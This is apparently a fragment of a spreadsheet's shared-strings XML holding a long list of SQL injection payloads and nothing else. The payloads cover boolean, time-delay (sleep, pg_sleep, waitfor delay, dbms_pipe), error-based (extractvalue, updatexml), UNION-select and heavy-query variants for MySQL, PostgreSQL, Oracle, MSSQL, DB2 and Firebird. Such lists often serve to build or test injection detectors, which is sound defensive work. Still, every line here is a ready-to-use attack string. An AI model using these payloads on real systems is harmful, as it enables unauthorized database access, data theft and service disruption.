    <t xml:space="preserve">1, ( select  ( case when  ( 2970 = 5830 )  then 1 else 2970* ( select 2970 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>-9432  )  )   as nqya where 8387 = 8387 or elt ( 9242 = 6180,6180 ) --</t>
  </si>
  <si>
    <t>-3343'|| ( select 'ssvt' where 5179 = 5179 union all select 5179,5179,5179,5179,5179,5179,5179,5179--</t>
  </si>
  <si>
    <t>1' )  as hvyx where 3194 = 3194 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'xhez' like 'xhez</t>
  </si>
  <si>
    <t>1 where 8905 = 8905 and make_set ( 7654 = 1923,1923 ) --</t>
  </si>
  <si>
    <t>1 )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1 )  as xwgf where 4204 = 4204 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1%'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>1'|| ( select 'aoad' where 8795 = 8795 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>1 where 7425 = 7425 rlike  ( select  ( case when  ( 4056 = 3196 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>-7691" or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-1710"  )  )   as cvky where 1858 = 1858 union all select 1858,1858--</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-7775 or 8571 = 8571--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 5603 = 5603 )  then 5603 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>1'  )  )   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( 'ccqs' = 'ccqs</t>
  </si>
  <si>
    <t>1 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>-5972" or 8509 = 3448#</t>
  </si>
  <si>
    <t>1" and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-9160' )  union all select 8148,8148,8148,8148,8148,8148,8148,8148,8148,8148#</t>
  </si>
  <si>
    <t>1'|| ( select 'ylio' from dual where 3767 = 3767 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1  )  )   as spdf where 8554 = 8554 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'|| ( select 'xbvz' from dual where 1632 = 1632 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%"  )  )   and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-4699 )  as mymz where 3405 = 3405 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>1 )  as jtfx where 8038 = 8038</t>
  </si>
  <si>
    <t>1" where 5845 = 5845 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-2857%'  )  )   )  union all select 7167,7167,7167,7167,7167,7167,7167,7167#</t>
  </si>
  <si>
    <t>1%' or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and '%' = '</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (   ( 'qjsc' = 'qjsc</t>
  </si>
  <si>
    <t>1' )  where 5279 = 5279 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1%' )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1%'  )  )   and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>-2233' or  ( 1807 = 7274 ) *7274</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 8770 = 9611,1,1/0 ) </t>
  </si>
  <si>
    <t>1%'  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1" )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( "tlpw" = "tlpw</t>
  </si>
  <si>
    <t xml:space="preserve">1" or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) </t>
  </si>
  <si>
    <t>1 )  where 3740 = 3740 union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "nthu" like "nthu</t>
  </si>
  <si>
    <t>1  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  2939 = 2939</t>
  </si>
  <si>
    <t>1  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( 3919 = 3919</t>
  </si>
  <si>
    <t>1' where 9241 = 9241 or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and make_set ( 7539 = 3946,3946 )  and   (  (   ( 'qbpo' = 'qbpo</t>
  </si>
  <si>
    <t>1 )  as sglv where 7676 = 7676</t>
  </si>
  <si>
    <t xml:space="preserve">1" or sleep ( 5 ) </t>
  </si>
  <si>
    <t>1 )  where 8041 = 8041</t>
  </si>
  <si>
    <t>1' )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null#</t>
  </si>
  <si>
    <t>1%' rlike  ( select  ( case when  ( 3596 = 4245 )  then 1 else 0x28 end  )  )   and '%' = '</t>
  </si>
  <si>
    <t>1' )  where 1625 = 1625 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  </t>
  </si>
  <si>
    <t>-6249'  )  )   )  union all select 5136,5136,5136,5136,5136,5136,5136,5136,5136--</t>
  </si>
  <si>
    <t>-1187' )  union all select 8202,8202,8202,8202,8202,8202,8202#</t>
  </si>
  <si>
    <t>1%' )  and  ( 3020 = 3020 ) *6703 and  ( '%' = '</t>
  </si>
  <si>
    <t>1" or sleep ( 5 )  and "telb" = "telb</t>
  </si>
  <si>
    <t>1%' and sleep ( 5 )  and '%' = '</t>
  </si>
  <si>
    <t>1%" )  and make_set ( 9956 = 1060,1060 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( 4537 = 4537</t>
  </si>
  <si>
    <t>select case when 5894 = 4052 then 1 else null end--</t>
  </si>
  <si>
    <t>1 )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1" )  where 8254 = 8254 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-8686" where 4532 = 4532 or elt ( 3301 = 9065,9065 ) --</t>
  </si>
  <si>
    <t>-9496  )  )   )  or elt ( 7511 = 3951,3951 )  and   (  (   ( 3514 = 3514</t>
  </si>
  <si>
    <t>1%" )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   as qswu where 6377 = 6377</t>
  </si>
  <si>
    <t>1" )  as semi where 4260 = 4260</t>
  </si>
  <si>
    <t>1 and elt ( 4249 = 4249,7259 ) # lwyo</t>
  </si>
  <si>
    <t>1' in boolean mode )  or elt ( 6272 = 6272,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1' and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and 'tfso' = 'tfso</t>
  </si>
  <si>
    <t>-3498"  )  )   as xbvb where 2056 = 2056 union all select 2056,2056,2056,2056,2056,2056,2056--</t>
  </si>
  <si>
    <t>-9606%"  )  )   )  union all select 8572,8572,8572,8572,8572,8572,8572,8572,8572--</t>
  </si>
  <si>
    <t>1  )  )   )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1" )  where 9020 = 9020 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>1' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( 'xkxi' like 'xkxi</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t>-4182  )  )   as wkfh where 6145 = 6145 union all select 6145,6145,6145,6145,6145#</t>
  </si>
  <si>
    <t>1%' )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' )  where 3893 = 3893</t>
  </si>
  <si>
    <t>1%'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t xml:space="preserve">-1050"  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t>1%'  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-9749" where 7083 = 7083 or make_set ( 7577 = 1182,1182 ) --</t>
  </si>
  <si>
    <t>1' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( 'kejy' = 'kejy</t>
  </si>
  <si>
    <t>1'+ ( select uzan where 4312 = 4312 and make_set ( 3129 = 9555,9555  )  )  +'</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( "uydm" = "uydm</t>
  </si>
  <si>
    <t>1" waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-8370'  )  )   or  ( 3501 = 6407 ) *6407 and   (  (  'agcm' like 'agcm</t>
  </si>
  <si>
    <t>1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and 'yaje' = 'yaje</t>
  </si>
  <si>
    <t>1" or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and "jbty" like "jbty</t>
  </si>
  <si>
    <t>1  )  )   as gobw where 3496 = 3496 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' )  as jztg where 1222 = 1222 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-5356' )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1 )  as ihan where 5298 = 5298 and elt ( 6587 = 3479,3479 ) --</t>
  </si>
  <si>
    <t>-1993%" )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1%' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( '%' = '</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</si>
  <si>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</si>
  <si>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   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "yxpo" like "yxpo</t>
  </si>
  <si>
    <t>1%'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>1' )  as sagj where 4558 = 4558</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( 1321 = 1321</t>
  </si>
  <si>
    <t>1  )  )   as dgso where 4654 = 4654 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>1' )  where 2974 = 2974 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve">-4822" or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1' where 1628 = 1628 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1 )  as nkjo where 8462 = 8462 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) </t>
  </si>
  <si>
    <t>-2759%"  )  )   or 7769 = 1249#</t>
  </si>
  <si>
    <t>-8404  )  )   order by 1--</t>
  </si>
  <si>
    <t>1  )  )   as wajy where 8593 = 8593</t>
  </si>
  <si>
    <t>1'|| ( select 'adni' from dual where 6611 = 6611</t>
  </si>
  <si>
    <t>-9871" )  union all select 9082#</t>
  </si>
  <si>
    <t>1' )  where 9516 = 9516</t>
  </si>
  <si>
    <t>1" where 5039 = 5039 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   as rsnb where 3168 = 3168 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1'+ ( select 'mikf' where 5814 = 5814 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1' where 7080 = 7080 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1%' waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-2527  )  )   as oqpy where 7468 = 7468 or 3038 = 3038</t>
  </si>
  <si>
    <t>select * from generate_series ( 9167,9167,case when  ( 9167 = 2273 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) # hlrg</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null#</t>
  </si>
  <si>
    <t>1" )  where 2278 = 2278</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and "lhcv" = "lhcv</t>
  </si>
  <si>
    <t>-2625' )  or elt ( 1032 = 1032,3623 )  and  ( 'eliy' = 'eliy</t>
  </si>
  <si>
    <t>select  ( case when  ( 4341 = 7041 )  then 4341 else 4341* ( select 4341 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( 'ljhc' = 'ljhc</t>
  </si>
  <si>
    <t>1'  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'skdy' = 'skdy</t>
  </si>
  <si>
    <t>-4462%" )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>1%" )  union all select null,null#</t>
  </si>
  <si>
    <t>1' )  as vlwh where 9403 = 9403 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1'  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 'cbnc' like 'cbnc</t>
  </si>
  <si>
    <t>-6595  )  )   )  union all select 2688,2688,2688,2688,2688,2688,2688,2688,2688,2688#</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 5571 = 4947,1,1/0 ) </t>
  </si>
  <si>
    <t>-7772'  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>1%' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and '%' = '</t>
  </si>
  <si>
    <t>1  )  )   as kccx where 7547 = 7547 union all select null--</t>
  </si>
  <si>
    <t>1%" )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1 )  as nlig where 5964 = 5964 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1'  )  )   as bbdf where 1327 = 1327</t>
  </si>
  <si>
    <t>1' where 8803 = 8803 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-7511  )  )   as xqzf where 9939 = 9939 union all select 9939,9939,9939,9939,9939,9939,9939--</t>
  </si>
  <si>
    <t>1 )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and "mezx" like "mezx</t>
  </si>
  <si>
    <t>1 where 3535 = 3535 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  # ogwe</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual# gnga</t>
  </si>
  <si>
    <t>1" )  as wvxt where 7321 = 7321 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (   ( 'owga' like 'owga</t>
  </si>
  <si>
    <t>1'  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( 'zxon' like 'zxon</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'zovb' like 'zovb</t>
  </si>
  <si>
    <t>1" )  where 9223 = 9223 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1 )  as jdhz where 2021 = 2021</t>
  </si>
  <si>
    <t>1'|| ( select 'ptkj' from dual where 6263 = 6263 union all select null--</t>
  </si>
  <si>
    <t xml:space="preserve">-5597' )  or make_set ( 2490 = 2164,2164 ) </t>
  </si>
  <si>
    <t>-5694  )  )   as cxnb where 6858 = 6858 or 9323 = 9323#</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1%' and elt ( 1210 = 1210,sleep ( 5  )  )   and '%' = '</t>
  </si>
  <si>
    <t>1" and elt ( 4249 = 4249,7259 )  and "kgtz" like "kgtz</t>
  </si>
  <si>
    <t>1'|| ( select 'allj' where 7334 = 7334</t>
  </si>
  <si>
    <t>-2667 )  union all select 5848,5848,5848,5848--</t>
  </si>
  <si>
    <t>1'|| ( select 'mzsy' where 4940 = 4940 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-1598  )  )   )  union all select 9418,9418,9418,9418,9418,9418,9418#</t>
  </si>
  <si>
    <t>-6659' )  where 1256 = 1256 union all select 1256,1256--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as jrld where 3488 = 3488</t>
  </si>
  <si>
    <t>-2028%'  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +c</t>
  </si>
  <si>
    <t>1 )  as tjwa where 1173 = 1173 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'cylu' = 'cylu</t>
  </si>
  <si>
    <t>1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) # utdm</t>
  </si>
  <si>
    <t>1  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 3505 = 3505</t>
  </si>
  <si>
    <t>-3862' )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) # yoch</t>
  </si>
  <si>
    <t>-9858" or 8592 = 8553</t>
  </si>
  <si>
    <t>1%'  )  )   and 7533 = 7533 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 )  as wvpl where 9791 = 9791 and make_set ( 3491 = 9067,9067 ) --</t>
  </si>
  <si>
    <t>-1908'  )  )   )  union all select 7665#</t>
  </si>
  <si>
    <t>-1876%' )  union all select 6463--</t>
  </si>
  <si>
    <t>-6813  )  )   )  or 6872 = 6872 and   (  (   ( 7304 = 7304</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  'ogpg' = 'ogpg</t>
  </si>
  <si>
    <t>1"  )  )   as rign where 1604 = 1604 and 3661 = 3054--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (  'ozan' = 'ozan</t>
  </si>
  <si>
    <t>1" )  where 3393 = 3393 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  4048 = 4048</t>
  </si>
  <si>
    <t>1 )  as wuio where 5312 = 5312 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>-5396'|| ( select 'fjhd' from dual where 4019 = 4019 union all select 4019,4019,4019,4019#</t>
  </si>
  <si>
